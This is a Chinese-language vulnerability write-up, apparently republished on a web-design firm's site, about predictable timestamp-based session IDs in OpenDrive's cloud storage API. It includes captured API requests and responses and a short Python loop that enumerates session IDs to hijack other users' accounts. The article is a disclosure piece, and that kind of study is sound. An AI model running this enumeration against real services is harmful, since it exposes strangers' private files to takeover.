發(fā)現(xiàn)OpenDrive云存儲平臺的會話機制漏洞的示例分析���,很多新手對此不是很清楚����,為了幫助大家解決這個難題,下面小編將為大家詳細講解�,有這方面需求的人可以來學習下,希望你能有所收獲��。
創(chuàng)新互聯(lián)是一家以網(wǎng)絡(luò)技術(shù)公司�����,為中小企業(yè)提供網(wǎng)站維護�、成都網(wǎng)站設(shè)計��、做網(wǎng)站�、成都外貿(mào)網(wǎng)站建設(shè)公司����、網(wǎng)站備案、服務(wù)器租用����、域名注冊、軟件開發(fā)���、成都小程序開發(fā)等企業(yè)互聯(lián)網(wǎng)相關(guān)業(yè)務(wù)�,是一家有著豐富的互聯(lián)網(wǎng)運營推廣經(jīng)驗的科技公司����,有著多年的網(wǎng)站建站經(jīng)驗,致力于幫助中小企業(yè)在互聯(lián)網(wǎng)讓打出自已的品牌和口碑�����,讓企業(yè)在互聯(lián)網(wǎng)上打開一個面向全國乃至全球的業(yè)務(wù)窗口:建站歡迎咨詢:028-86922220
最近在對比云存儲解決方案時�,我驚訝地發(fā)現(xiàn)很多公司仍然在提供無限量云端數(shù)據(jù)存儲服務(wù)方案,像OpenDrive公司就是這樣(注意別和OpenDRIVE格式規(guī)范混淆),OpenDrive公司專為個人�����、商業(yè)團體和公司企業(yè)提供無限存儲方案��。
除了傳統(tǒng)的云存儲功能外�����,OpenDrive還以軟件客戶端和移動APP的應(yīng)用形式��,為使用客戶提供存儲備份和內(nèi)容管理解決方案��,據(jù)OpenDrive官網(wǎng)介紹��,包括T-Mobile��、Ancestry.com和REMAX在內(nèi)的很多知名公司�,都是其客戶群體����。
發(fā)現(xiàn)
我通過網(wǎng)頁客戶端,注冊了一個OpenDrive的試用賬戶進行測試�。在上傳了一些測試文件之后,我留意查看了其標記和API請求后發(fā)現(xiàn),OpenDrive公司網(wǎng)站架構(gòu)為WordPress���,而且包括樣式���、登錄和API使用等很多地方都有明顯定制化開發(fā)的痕跡。
我還通過HTTP代理注意到���,在整個存儲過程中����,存儲機制會對兩個API服務(wù)端發(fā)起調(diào)用����,一個是www開頭且用cookie進行驗證的子域名服務(wù)端,另一個是如下以web開頭并用單獨的 session ID 進行驗證的API服務(wù)端:
GET https://web.opendrive.com/api/v1/download/file.json/ABC123***REMOVED***?session_id=1517592191112474005&inline=0&preview=1 HTTP/1.1
Host: web.opendrive.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
注意上述GET請求中session_id中的值:
session_id=1517592191 112474005
這個值與Unix系統(tǒng)下的時間戳有些類似�����,它極有可能是用戶初始登錄請求時的時間點轉(zhuǎn)化過來的信息---不太好是吧�����!實際上�,前10個數(shù)字就是從我賬戶首次登錄時的 日期/時間(data/time)信息轉(zhuǎn)化過來的。
上面session_id中剩下的9位數(shù)字可能只是相同登錄時間下的其它更精確的生成值,例如來自服務(wù)器端函數(shù)�,如PHP的microtime中生成的毫秒。我嘗試通過連續(xù)發(fā)出大量登錄請求��,來比較生成的session_id值進行驗證����,正如預(yù)測的那樣,這些數(shù)字都是連續(xù)的時間值����。
接下來,我決定看看這種會話機制是如何使用的�����,它對OpenDrive’產(chǎn)品的安全性影響如何���。由于網(wǎng)頁客戶端對該API的調(diào)用功能有限�,所以我在測試手機上安裝了一個OpenDrive的安卓應(yīng)用APP�����。
在測試手機上部署好請求代理之后�,我就登錄了自己的OpenDrive賬戶,開始瀏覽文件�����、移動文件夾���、訪問我賬戶下的其它信息���。經(jīng)過觀察,我發(fā)現(xiàn)��,所有API服務(wù)端都使用了相同的��,且存在漏洞缺陷的以下session_id生成機制���,如以下請求示例:
GET https://ai2.opendrive.com/api/v1/users/info.json/1517592191112474005 HTTP/1.1session_id: 1517592191112474005Host: ai2.opendrive.comConnection: Keep-AliveAccept-Encoding: gzipUser-Agent: okhttp/3.7.0
上述請求發(fā)起來�,返回了相應(yīng)的JSON響應(yīng)如下:
{
"UserID": 1853669,
"AccessUserID": 0,
"UserName": "***REMOVED***",
"UserFirstName": "***REMOVED***",
"UserLastName": "***REMOVED***",
"PrivateKey": "***REMOVED***",
"Trial": "0",
"UserSince": "1517591533",
"BwResetLast": "1517591533",
"AccType": "1",
"MaxStorage": "5120",
"StorageUsed": "361144",
"BwMax": "1024",
"BwUsed": "0",
"FVersioning": "0",
"FVersions": "10",
"DailyStat": 0,
"UserLang": "en",
"MaxFileSize": "102400",
"Level": "1",
"UserPlan": "Basic Plan",
"TimeZone": "America\/Los_Angeles",
"MaxAccountUsers": "1",
"IsAccountUser": 0,
"CompanyName": "",
"Email": "***REMOVED***",
"Phone": "",
"Avatar": null,
"AvatarColor": "a38f84",
"AdminMode": 1,
"DueDate": "0000-00-00",
"WebLink": "",
"PublicProfiles": 0,
"RootFolderPermission": 2,
"CanChangePwd": 1,
"IsPartner": 0,
"Partner": "OpenDrive",
"SupportUrl": "http:\/\/support.opendrive.com",
"PartnerUsersDomain": ".opendrive.com",
"Suspended": false,
"Affiliation": "0",
"UserUID": "5ac61707c2ee6"
}同樣的�����,以上信息說明���,該應(yīng)用的所有方面都應(yīng)該是由一個高度可預(yù)測且順序的“session”值來控制的��。以下是獲取文件夾內(nèi)容的請求示例:
GET https://ai2.opendrive.com/api/v1/folder/list.json/1517592191112474005/NjlfMTA2NzgyNF93RjZaUw?last_request_time=0&offset=0 HTTP/1.1
session_id: 1517592191112474005
Host: ai2.opendrive.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.7.0
響應(yīng)結(jié)果如下:
{
"DirUpdateTime": "1522940036",
"Name": "Pictures",
"ParentFolderID": "NjlfMF93RjZaUw",
"DirectFolderLink": "https:\/\/od.lk\/fl\/NjlfMTA2NzgyNF8",
"ResponseType": 1,
"Folders": [],
"Files": [{
"FileId": "NjlfNzU3MTg2OV9RRDgxUA",
"Name": "1337.jpg",
"GroupID": 0,
"Extension": "jpg",
"Size": "5289",
"Views": "0",
"Version": "",
"Downloads": "1",
"DateModified": "1522940033",
"Access": "2",
"Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg2OV8",
"DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg2OV8\/1337.jpg",
"StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg2OV8\/1337.jpg",
"TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg2OV8?inline=1",
"ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg2OV9RRDgxUA?session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8",
"Password": "",
"EditOnline": 1
}, {
"FileId": "NjlfNzU3MTg3MF9ZQ3NDYg",
"Name": "test.jpg",
"GroupID": 0,
"Extension": "jpg",
"Size": "51756",
"Views": "0",
"Version": "",
"Downloads": "0",
"DateModified": "1522940034",
"Access": "2",
"Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg3MF8",
"DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg3MF8\/test.jpg",
"StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg3MF8\/test.jpg",
"TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg3MF8?inline=1",
"ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg3MF9ZQ3NDYg?session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8",
"Password": "",
"EditOnline": 1
}]
}注意了��,通過分析�,我發(fā)現(xiàn),在這種會話機制下�����,任何OpenDrive系統(tǒng)下的用戶賬戶都會被劫持�,而且各自的私人文件都會被以下一段簡單的腳本來實現(xiàn)獲取或破壞,這種情況很難認為它是一個漏洞���,也不會覺得是一種根本的設(shè)計缺陷��。
url = "https://ai2.opendrive.com/api/v1/users/info.json"
session = 1517592191112474005
while True:
f_url = "{}/{}".format(url, session)
r = requests.get(f_url)
if r.status_code == 200:
print(f_url)
session -= 1漏洞利用場景
這種會話機制的風險顯而易見��,但主要存在兩種攻擊場景:一是有適度資源支持的攻擊者可以輕易地探測到系統(tǒng)中有效的其它用戶會話����;二是針對單個用戶的定向攻擊只需知道用戶的大概登錄時間�,這縮小了攻擊者的會話查找范圍。其它風險隱患:
會話不會過期����,OpenDrive系統(tǒng)下我二月份測試的會話在三月份仍然有效;
每次登錄都會生成一個新的會話��,這也意味著����,任何給定用戶會存在多種會話條目;
存在漏洞的會話機制不只存在于安卓 APP/客戶端���,一樣存在于網(wǎng)頁和桌面系統(tǒng)的其它客戶端中�����,實際上也就是說�����,所有OpenDrive用戶都會受到影響�。
不清楚在之前的OpenDrive的緩解措施中�,這種會話還存在多少,但可以肯定的是�����,這確實是一個安全威脅���。
看完上述內(nèi)容是否對您有幫助呢��?如果還想對相關(guān)知識有進一步的了解或閱讀更多相關(guān)文章��,請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道���,感謝您對創(chuàng)新互聯(lián)的支持����。
本文名稱:發(fā)現(xiàn)OpenDrive云存儲平臺的會話機制漏洞的示例分析
當前路徑:
http://weahome.cn/article/pdiejh.html
重慶分公司
重慶分公司
